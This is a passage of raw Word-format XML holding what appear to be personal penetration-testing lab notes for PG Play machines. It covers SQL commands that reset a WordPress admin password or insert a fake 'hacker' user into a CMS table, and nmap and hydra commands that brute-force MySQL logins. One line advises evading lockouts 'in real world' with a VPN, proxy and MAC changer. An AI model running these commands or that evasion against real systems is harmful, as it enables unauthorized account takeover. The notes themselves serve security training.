          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MD5('password')</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE wp_users.user_login = "admin";</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019EA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">update wp_users set user_pass=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MD5('password')</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where ID=1;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="559"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we can log into wordpress now with credentials admin : password</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rczf9kr0gexc" w:id="212"/>
      <w:bookmarkEnd w:id="212"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add row to MySQL table (useful for adding fake users to access a website)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019F0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId526">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">My-CMSMS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, while this attack vector didn't work, it was a good idea. We got a MySQL table which corresponded to a CMS website. And we wanted to get into that CMS website. So, once we got access to the MySQL table, we tried adding in our own user so that we can past the login page. </w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="698500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="75" name="image68.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image68.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52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19F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="514"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is the table before, with just the user Admin. The MD5 password hash was unbreakable btw, just in case you were curious why they didn't get root from this</w:t>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t xml:space="preserve">Then you have to create your own MD5 hashed password and then insert a row like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="955"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">insert into cms_users values(2,'hacker',</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'enter_hash'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">,1,NULL,NULL,1,NULL,NULL);</w:t>
      </w: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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="965200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="340" name="image335.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image335.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId528"/>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19F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="276"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now the table has a second user. But, the website must not have been synchronized with this table because the login page didn't accept this new user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019FA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019FB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And if you were curious, the correct attack vector was to actually reset the admin password. You can see how we did it in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CMSMS </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sub-section within the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">New Attack Methods</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019FC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019FE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2nl1ozj57w76" w:id="213"/>
      <w:bookmarkEnd w:id="213"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute Forcing mysql:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For usernames, try from this list. Try "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> first</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3973575" cy="2445277"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="451" name="image437.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image437.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId529"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3973575" cy="2445277"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap -p 3306 -- script mysql -* 192.168.241.118</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For passwords, use rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To run brute force, do: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-P /usr/share/wordlists/rockyou.txt mysql://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.241.118</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t 26 -f -v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A04">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before you run brute force, beware of being locked out. Look at the section below for more information. Might be better to try manual brute force first</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t 26 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: This sets the number of parallel connections (threads) Hydra will use. Here, it will use 26 threads, allowing for faster cracking but consuming more resources.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A06">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-f </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: This tells Hydra to exit after finding the first valid username/password pair. This is useful if you only want to get in and don't need to find every possible valid password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-v</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : This is verbose mode. Hydra will show details of the login attempts it's making. If you want even more detail, you could use -V (uppercase) for "very verbose."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A08">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A09">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i3xf6d70baqh" w:id="214"/>
      <w:bookmarkEnd w:id="214"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Getting blocked due to automated bruteforce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A0A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId530">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">My-CMSMS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, they tried brute forcing MySQL using hydra, but they got blocked, like below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A0B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2019300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="90" name="image94.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image94.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53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A0C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A0D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We got blocked due to multiple brute force illegal attempts. In real world, just changing the VPN / proxy + MAC changer will be alright.</w:t>
      </w:r>
    </w:p>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t xml:space="preserve">In our case, we reset the machine again and this time we try </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">manually </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with default common credentials.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A10">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A11">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hmxd07t7aqf0" w:id="215"/>
      <w:bookmarkEnd w:id="215"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual Bruteforce:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A12">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql -u root -h $IP -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A13">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1180"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It will prompt for password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A14">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here are some combinations to try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A15">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root:root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A16">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:admin</w:t>
      </w:r>
    </w:p>
